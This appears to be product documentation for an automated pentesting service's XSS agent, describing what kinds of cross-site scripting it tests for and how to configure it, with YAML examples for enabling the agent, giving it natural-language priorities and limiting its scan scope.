XSS Agent¶

The XSS (Cross-Site Scripting) Agent autonomously discovers reflected, stored, and DOM-based XSS issues through context-aware payload crafting and testing.

Capabilities¶

• Reflected XSS Detection: Tests for XSS vulnerabilities where scripts are reflected immediately in responses
• Stored XSS Detection: Tests for XSS vulnerabilities where scripts are stored and executed later
• DOM-Based XSS Detection: Tests for XSS vulnerabilities through DOM manipulation
• Context-Aware Payload Generation: Crafts payloads adapted to HTML, attributes, JavaScript, CSS, SVG contexts
• CSP Bypass Techniques: Tests Content Security Policy bypass methods
• Framework-Specific Testing: Tests React, Vue, Angular, Svelte frameworks

Configuration¶

Basic Configuration¶

The XSS agent is enabled by default on all automated pentesting scans. No additional configuration is required for the agent to run.

To explicitly disable it:

automated_pentesting:
  xss_agent:
    enabled: false

Natural-Language Guidance¶

Use automated_pentesting.xss_agent.natural_language to tell the agent where user-controlled content is most important, what workflows matter, and which actions should be avoided.

This field is optional, but it improves prioritization and helps the agent spend more time on the pages and inputs that are most likely to surface meaningful XSS issues.

automated_pentesting:
  xss_agent:
    enabled: true
    natural_language: |
      Profile names, ticket comments, and internal announcements are rendered in
      multiple pages across the application. Prioritize stored XSS in rich-text
      inputs and markdown-like editors. Avoid logout, billing, and account deletion
      flows during testing.

Good things to include:

• High-value inputs that render user-controlled content later
• Important pages or workflows to prioritize
• Risky rendering contexts such as WYSIWYG editors, markdown, previews, or templated emails
• Actions the agent should avoid because they are destructive or out of scope

Scope Configuration¶

Configure scope to focus testing:

scope:
  include:
    - "https://app.example.com/*"
  exclude:
    - "https://app.example.com/admin/*"

Requirements¶

• Web Applications: Designed for web applications, not APIs
• JavaScript Execution: Requires JavaScript execution for DOM-based XSS testing
• Start URL: Initial URL to begin exploration
• Authentication (optional): Configure if application requires authentication

Limitations¶

• Web applications only
• Requires JavaScript execution
• Tests within configured scope boundaries
• Limited by scan timeout settings

Best Practices¶

• Keep natural_language concrete and application-specific.
• Mention stored-content surfaces explicitly when persistence matters.
• Prefer describing business-relevant workflows over generic instructions like "test everything".
• Use scan scope to restrict where the agent can go; use natural_language to explain what matters within that scope.

Related Documentation¶

• How It Works: Understanding XSS injection capabilities
• Frontend DAST Configuration: WebApp testing configuration options
• Agentic Crawling: Technical details on crawling
• Authentication: Set up authentication for scans